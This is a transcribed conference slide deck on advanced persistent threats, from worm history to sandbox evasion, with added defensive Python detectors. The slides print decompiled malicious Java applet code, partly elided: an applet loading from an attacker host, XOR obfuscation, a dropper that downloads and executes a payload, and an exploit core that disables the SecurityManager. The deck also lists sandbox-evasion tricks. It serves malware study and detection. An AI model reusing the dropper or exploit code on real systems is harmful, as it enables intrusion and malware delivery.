Even the cybercrime business has its innovations, and the evolution concerns botnet-for-hire services or self-construction kits for building malware suited to any occasion. In this consumerization of crime, attention therefore shifts to the clients, to exploit the trust of the unsuspecting victim and obtain the information of interest. How do the new attack campaigns work? What stratagems do they use? How can they be detected? The world of guest images and their rapid and innovative evolution, the open projects, but also the limits to take into account.
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion Milan 2014
1. THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili
apompili@hotmail.com – Xilogic Corp.
MILAN 28-29.11.2014
www.codemotionworld.com
Except where otherwise noted, this work is licensed under
http://creativecommons.org/licenses/by-nc-sa/3.0/
There are only 10 types of people in the world:
Those who understand binary, and those who don't
2. Attacker Math (Dino Dai Zovi)
http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
3. How does an attack develop?
4. <1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
5. <2000>
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
8.7 billion dollars
6. Lesson Learned
#1> God bless users
7. <2001> The Nimda Style
635 million dollars
> Microsoft IE MIME Header Attachment Execution Vulnerability
> Microsoft Office 2000 DLL Execution Vulnerability (RICHED20.DLL)
> Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
> Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability
> TFTP Server Execution Vulnerability (UDP:69)
8. Lesson Learned
#1> God bless users
#2> You don't necessarily have to go after the servers
9. 75,000 computers infected in just 10 minutes
payload of only 376 bytes (resident exclusively in memory)
1.2 billion dollars
SQL Server 2000 Desktop Engine
10. Lesson Learned
#1> God bless users
#2> You don't necessarily have to go after the servers
11. Backdoor TCP 3127-3198
http://echohacker.altervista.org/articoli/mydoom.html
22.6 billion dollars
DDoS against www.sco.com
0x85 0x13 0x3c 0x9e 0xa2 Upload&Execute
12. Lesson Learned
#1> God bless users
#2> You don't necessarily have to go after the servers
#4> Why limit yourself to doing damage only once
13. <2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
14. Flame: the most complex malware in history
> 20MB in size (900Kb main program/dropper + 16 modules detected to date)
> 80 domains used as Command and Control systems
> Spread via USB stick (Infectmedia)
> Enumeration of Bluetooth devices (Beetlejuice)
> Audio recording (Microbe)
> Windows Update MITM (Munch & Gadget)
MD5 Collision Attack
15. Lesson Learned
#1> God bless users
#2> You don't necessarily have to go after the servers
#4> Why limit yourself to doing damage only once
#5> The spending budget is a function of the target
16. <2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
17. Lesson Learned
#1> God bless users
#2> You don't necessarily have to go after the servers
#4> Why limit yourself to doing damage only once
#5> The spending budget is a function of the target
#6> The sum always makes the total
18. http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
19. A General APT Architecture
Infection Stage: Vector, Exploit, Dropper, Launcher, Downloader
Malware Core: Module <01> … Module <XX>
Command & Control
20. Infection Stage> The Botnet Choice
21. Infection Stage> Drive-to-Click <#1>
22. Infection Stage> Drive-to-Click <#2>
23. Infection Stage> Drive-to-Click <#3>
24. Drive-to-Click <#5>
25. Trick#1> Playing with extensions
RLO Unicode control character
26. Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
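As an added example (not from the talk), here is the check a download filter would apply to cover both tricks: it parses the filename out of a Content-Disposition header, models how an RLO (U+202E) makes the name display, and compares the displayed extension, the real extension and the URL's own filename. The header values and URL paths are constructed for the demo; the function names and the executable-extension list are my own choices.

```python
from email.message import Message

# Unicode bidi control characters that change how a filename is displayed.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
RLO = "\u202e"
# Extensions Windows runs on double-click (demo list, not exhaustive).
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe",
                  "js", "jse", "jar", "hta", "lnk", "msi"}

def strip_bidi(name: str) -> str:
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)

def displayed_name(name: str) -> str:
    """Approximate what the user sees: text after an RLO is rendered
    right-to-left, i.e. reversed (only the first RLO is modelled)."""
    head, sep, tail = name.partition(RLO)
    return strip_bidi(head) + (strip_bidi(tail)[::-1] if sep else "")

def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def filename_from_content_disposition(header_value: str) -> str:
    """Parse 'attachment; filename="..."' with the stdlib mail parser,
    which also handles quoting and RFC 2231 (filename*=) encoded names."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    return msg.get_filename() or ""

def assess(header_value: str, url_path: str) -> dict:
    """What the OS will use vs. what the user sees, plus the findings a filter raises."""
    raw = filename_from_content_disposition(header_value)
    shown = displayed_name(raw)
    # The handler is chosen from what follows the last dot; bidi controls do not change that.
    real_ext = extension(strip_bidi(raw))
    shown_ext = extension(shown)
    url_name = url_path.rsplit("/", 1)[-1]
    findings = []
    if any(ch in BIDI_CONTROLS for ch in raw):
        findings.append("bidi control character in filename")
    if real_ext != shown_ext:
        findings.append(f"displayed extension .{shown_ext} differs from real .{real_ext}")
    if real_ext in EXECUTABLE_EXT:
        findings.append(f"executable extension .{real_ext}")
    if url_name and url_name != raw:
        findings.append(f"header filename differs from URL name {url_name!r}")
    return {"filename": raw, "displayed": shown, "real_ext": real_ext, "findings": findings}

if __name__ == "__main__":
    # Constructed samples: an RLO-spoofed attachment, a header that renames the download, a clean one.
    for hdr, path in [('attachment; filename="invoice\u202efdp.exe"', "/files/invoice.pdf"),
                      ("attachment; filename=report.exe", "/files/report.pdf"),
                      ('inline; filename="report.pdf"', "/files/report.pdf")]:
        print(assess(hdr, path))
```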
27. Exploiting> The same old story
> Old Client Vulnerabilities
> Disclosed Client Vulnerabilities without a Patch
> 0-Day Exploit
> 1-Day Exploit PoC
28. Make or Buy?
29. A Security day
<applet codebase="http://blahblah.evilsite.in/hiddenpath/"
        archive="http://blahblah.othersite.in/hiddenpath/c8c34734f41cca863a972129369060d9"
        code="rgmiv">
30.
public class xp extends JApplet {
    public void init() {
        try {
            Object aobj[] = new Object[0];
            Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
            String s = "hpjwbludyi";
            s = "wgpxrwyvzolbb";
            s = "zdfmvftloqmakqysyu";
            s = "nrrkqnjfylgtljyyferr";
            cr.hzumfnc(obj);
            Object aobj1[] = new Object[0];
            String s1 = "ofvszonrzgelnko";
            s1 = "fefhtspcqhj";
            s1 = "evztavmzjarjgwu";
            Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
                Integer.TYPE
            }).newInstance(new Object[] {
                Integer.valueOf(tcbteokd.mdrikbua(9))
            });
            int ai[] = new int[8];
            Object aobj2[] = new Object[7];
            aobj2[2] = cr.hzumfnc(obj);
            ...
31. Malware <01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7");
...
public static String n(String s) {
    String s1 = "";
    for (int i = 0; i < s.length(); i++)
        s1 += idzfihff(s.charAt(i));
    return s1;
}
...
public static char idzfihff(char c) {
    return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
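As an added example (not from the talk or from the applet's code), here is the analyst side of this scheme: a decoder equivalent to ha.n(), a helper that decodes every n("...") literal found in decompiled source, and two ways to recover the key when it is not visible: brute force against a "dotted Java name" check for strings, and the known MZ header for a payload, which is how the 0x29 key used by the dropper class later in the deck can be recovered. The sample string and payload are constructed here by encrypting known plaintext; the function names are my own.

```python
import re

KEY_ON_SLIDE = 0x5b  # the constant idzfihff() xors every char with

def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key for b in data)

def decode_string(encoded: str, key: int = KEY_ON_SLIDE) -> str:
    """Equivalent of ha.n(): applies idzfihff() to every char."""
    return "".join(chr(ord(c) ^ key) for c in encoded)

# ha.n("...") call sites in decompiled source; decoding them all at once
# turns the class back into readable code.
CALL = re.compile(r'\bn\("((?:[^"\\]|\\.)*)"\)')

def decode_calls(source: str, key: int = KEY_ON_SLIDE) -> dict:
    return {m.group(1): decode_string(m.group(1), key) for m in CALL.finditer(source)}

# Strings in this family decode to dotted Java names ("java.awt.image...").
JAVA_NAME = re.compile(r"[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*")

def recover_string_key(blob: bytes) -> list:
    """Brute-force all 256 keys; keep those whose output looks like a Java name."""
    keys = []
    for key in range(256):
        text = xor_bytes(blob, key).decode("ascii", errors="replace")
        if JAVA_NAME.fullmatch(text):
            keys.append(key)
    return keys

def recover_key_from_mz(blob: bytes):
    """A payload that is written to disk and executed is a PE file, so its first
    two plaintext bytes are known ("MZ"): that pins a single-byte key."""
    if len(blob) < 2:
        return None
    key = blob[0] ^ ord("M")
    return key if blob[1] ^ key == ord("Z") else None

# Constructed samples: a class name encrypted the way the slide does, and a stub
# PE header encrypted with 0x29, the key the dropper class uses for its payload.
SAMPLE_STRING = xor_bytes(b"java.awt.image.SampleModel", KEY_ON_SLIDE)
SAMPLE_PAYLOAD = xor_bytes(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00", 0x29)

if __name__ == "__main__":
    src = 'public static String ok = ha.n("%s");' % SAMPLE_STRING.decode("latin-1")
    print(decode_calls(src))
    print([hex(k) for k in recover_string_key(SAMPLE_STRING)])
    print(hex(recover_key_from_mz(SAMPLE_PAYLOAD)))
```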
32. Malware <02> Java Reflection
public static Class fuss(String s) throws Exception {
    return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
    return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
    return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
33. Malware <03> ClassLoader Override
class t extends ClassLoader {
    public static void ujrzjw(t t1, String s) {
        try {
            Class class1 = t1.defineClass("qbw",
                tcbteokd.xcpoalaefqfvuacylvakyi, 0,
                tcbteokd.xcpoalaefqfvuacylvakyi.length);
            ygigtele.bjixqh(class1, new Class[] {
                tcbteokd.fuss("java.lang.String")
            }).newInstance(new Object[] { s });
        } catch (Exception ex) {
            System.exit(0);
        }
    }
}
34. The Dropper Class
...
private static void lcsqyrgtbct(String s, int i) {
    String s1 = s + Integer.valueOf(i);
    ...
    rchannel = Channels.newChannel((new URL(s1)).openStream());
    ...
    File file = File.createTempFile("~tmf", null);
    FileOutputStream fos = new FileOutputStream(file);
    for (int j = 0; j < abyte0.length; j++)
        abyte0[j] = (byte)(abyte0[j] ^ 0x29);
    fos.write(abyte0);
    if (abyte0.length > 1024)
        try {
            Runtime.getRuntime().exec(new String[] {
                "cmd.exe", "/C", file.getAbsolutePath()
            });
        } catch (IOException ioe) {
            (new ProcessBuilder(new String[] {
                file.getAbsolutePath()
            })).start();
        }
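As an added example (not from the talk), here is a static triage pass over decompiled applet source for the idioms these three slides show: reflection, a ClassLoader subclass calling defineClass, a SecurityManager reference, a single-byte XOR loop, temp-file creation and process execution. The weights, the threshold and both sample sources (the suspicious one stitched together from the fragments on the slides, the benign one a plain applet) are my own, constructed for the demo.

```python
import re

# (finding, regex over the decompiled source, weight); weights are a demo choice
INDICATORS = [
    ("reflection: Class.forName",       r"Class\.forName\s*\(", 2),
    ("reflection: constructor lookup",  r"\.getConstructor\s*\(|\.newInstance\s*\(", 2),
    ("reflection: Method.invoke",       r"\.invoke\s*\(", 2),
    ("custom ClassLoader subclass",     r"extends\s+ClassLoader\b", 3),
    ("defineClass from a byte array",   r"\bdefineClass\s*\(", 3),
    ("touches the SecurityManager",     r"setSecurityManager", 4),
    ("single-byte XOR decode loop",     r"\^\s*0x[0-9A-Fa-f]{1,2}\b", 2),
    ("drops a temp file",               r"createTempFile\s*\(", 2),
    ("downloads over a URL stream",     r"openStream\s*\(", 2),
    ("executes a dropped file",         r"Runtime\.getRuntime\(\)\.exec\s*\(|new\s+ProcessBuilder\s*\(", 4),
]
THRESHOLD = 8  # demo value: two strong or several weak indicators

def triage(source: str) -> dict:
    """Count every indicator and turn the weighted sum into a verdict."""
    hits, score = {}, 0
    for name, pattern, weight in INDICATORS:
        count = len(re.findall(pattern, source))
        if count:
            hits[name] = count
            score += weight
    verdict = "likely malicious" if score >= THRESHOLD else "review" if score else "clean"
    return {"score": score, "hits": hits, "verdict": verdict}

# Constructed fixtures: SUSPECT_SOURCE stitches together the idioms from the
# decompiled fragments on the slides; BENIGN_SOURCE is an ordinary applet.
SUSPECT_SOURCE = """
public class xp extends JApplet {
    public void init() throws Exception {
        Class c = Class.forName(ha.n("1:-:u:,/u26:<>"));
        Object o = c.getConstructor(new Class[] { Integer.TYPE }).newInstance(new Object[] { 9 });
        java.lang.reflect.Method m = c.getMethods()[0];
        m.invoke(o, new Object[0]);
        new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
    }
}
class t extends ClassLoader {
    void load(byte[] b, String s) throws Exception {
        Class k = defineClass("qbw", b, 0, b.length);
        k.getConstructor(new Class[] { String.class }).newInstance(new Object[] { s });
    }
}
class d {
    static void run(String u) throws Exception {
        byte[] a = new java.net.URL(u).openStream().readAllBytes();
        for (int j = 0; j < a.length; j++) a[j] = (byte)(a[j] ^ 0x29);
        java.io.File f = java.io.File.createTempFile("~tmf", null);
        Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", f.getAbsolutePath() });
    }
}
"""
BENIGN_SOURCE = """
public class hello extends JApplet {
    public void init() { getContentPane().add(new JLabel("hello")); }
}
"""

if __name__ == "__main__":
    print(triage(SUSPECT_SOURCE))
    print(triage(BENIGN_SOURCE))
```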
35. The Malware Core
http://valhalla.allalla.com/2013/08/java-netbeans-applet-integer-overflow-win32-target-added/
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
    obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 1, 1, 4, 0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
    new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4, 2, 1,
        0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte[] obj10 = new byte[] {0, -1};
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
36. The Cheaper Path to Exploiting
Blackhole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
Magnitude Exploit Kit
http://malware.dontneedcoffee.com/2013/10/Magnitude.html
37. A General APT Architecture (Exploit Kit)
Infection Stage: Vector, Exploit 01, Exploit 02 … Exploit n, Downloader
38. The InfoStealer Choice
39. The RAT Choice
40. Bitcoin + APT = Ransomware
41. The Command&Control Choice <#1>
42. The Command&Control Choice <#2>
43. The Command&Control Choice <#3>
44. Why not an Antivirus?
45. Panic! Encode it
http://upx.sourceforge.net/
46. Now things go better
47. <2012> The Antivirus Maker Confession
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-resourced
nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
48. The Way to Sandboxing
49. The Way to Sandboxing
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger)
<02> KERNEL-MODE PATCHING
Guest operating system kernel modified for tracing (rootkit)
<03> VIRTUAL MACHINE MONITORING
Customized hypervisor to monitor the guest operating system
<04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc.
<05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.
50. A (very) partial list of the Players
> Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
52. A (completely) partial list of the Evaders
53. Evading Sandbox 4 Dummies
> Human Interaction (UpClicker, December 2012)
> MessageBox (something that needs to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013: a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
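As an added example (not from the talk), here is a scorer that flags the evasion tricks listed above in a sandbox API-call trace. The one-call-per-line trace format, the rule weights and both sample traces are constructed for this demo; a real sandbox emits its own log format, so parse_trace() is the part to adapt.

```python
import re

CALL = re.compile(r"^t=(?P<t>[\d.]+)\s+(?P<api>\w+)\((?P<args>.*)\)$")
# Calls that mean the sample actually did something after its checks.
PAYLOAD_APIS = {"CreateProcessW", "CreateProcessA", "WriteFile", "connect", "send",
                "InternetOpenUrlW", "URLDownloadToFileW"}

def parse_trace(text: str) -> list:
    """One (time, api, args) tuple per 't=<sec> <Api>(<args>)' line; other lines are skipped."""
    calls = []
    for line in text.strip().splitlines():
        m = CALL.match(line.strip())
        if m:
            calls.append((float(m.group("t")), m.group("api"), m.group("args")))
    return calls

def sleep_ms(calls) -> int:
    return sum(int(a.split("=", 1)[1]) for _, api, a in calls if api == "Sleep")

def did_payload(calls) -> bool:
    return any(api in PAYLOAD_APIS for _, api, _ in calls)

# (finding, weight, predicate over the parsed call list); weights are a demo choice
RULES = [
    ("sleep stalling (Trojan Nap style)", 3, lambda c: sleep_ms(c) >= 60_000),
    ("waits for user interaction (UpClicker/MessageBox)", 2,
     lambda c: any(api.startswith(("MessageBox", "SetWindowsHookEx")) for _, api, _ in c)),
    ("checks Internet connectivity first", 1,
     lambda c: any(api in {"InternetCheckConnectionW", "InternetGetConnectedState", "gethostbyname"}
                   for _, api, _ in c)),
    ("inspects volume information/size", 2,
     lambda c: any(api in {"GetVolumeInformationW", "GetDiskFreeSpaceExW"} for _, api, _ in c)),
    ("reads its own executable name", 1,
     lambda c: any(api == "GetModuleFileNameW" for _, api, _ in c)),
    ("arms execution after reboot", 2,
     lambda c: any(api.startswith("RegSetValueEx") and "\\Run" in a for _, api, a in c)),
    ("probes services or VM artifacts", 2,
     lambda c: any(api in {"OpenSCManagerW", "EnumServicesStatusExW"}
                   or re.search(r"vbox|vmware|qemu", a, re.I) for _, api, a in c)),
    ("time trigger: reads the clock, then exits without acting", 2,
     lambda c: any(api in {"GetLocalTime", "GetSystemTime"} for _, api, _ in c) and not did_payload(c)),
]

def score_trace(text: str) -> dict:
    calls = parse_trace(text)
    findings = [name for name, _, pred in RULES if pred(calls)]
    score = sum(w for name, w, _ in RULES if name in findings)
    verdict = ("likely evasive" if score >= 5 else
               "weak indicators" if score else "no evasion indicators")
    return {"score": score, "findings": findings, "verdict": verdict}

# Constructed traces: the first runs its checks and then sleeps for ten minutes,
# the second is an ordinary program writing a file.
EVASIVE_TRACE = r"""
t=0.001 GetModuleFileNameW(hModule=0)
t=0.002 GetVolumeInformationW(root=C:\)
t=0.004 InternetCheckConnectionW(url=http://www.example.invalid/)
t=0.005 RegSetValueExW(key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run, name=upd)
t=0.010 MessageBoxW(text=The document could not be opened. Retry?)
t=0.020 Sleep(ms=600000)
t=600.100 GetLocalTime()
t=600.200 ExitProcess(code=0)
"""
BENIGN_TRACE = r"""
t=0.001 CreateFileW(path=C:\Users\demo\notes.txt)
t=0.002 WriteFile(bytes=120)
t=0.003 CloseHandle(h=0x1c)
t=0.004 ExitProcess(code=0)
"""

if __name__ == "__main__":
    print(score_trace(EVASIVE_TRACE))
    print(score_trace(BENIGN_TRACE))
```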
54. The limit of Sandboxes
def: Patient Zero is the first patient identified in the population sample of an epidemiological investigation…
(chart axis: Minutes)
55. Certainly better than trusting users
56. Domande? (Italian)
مَطَالِب أَيَّة (Arabic)
¿Preguntas? (Spanish)
Questions? (English)
tupoQghachmey (Klingon)
Ερωτήσεις? (Greek)
вопросы? (Russian)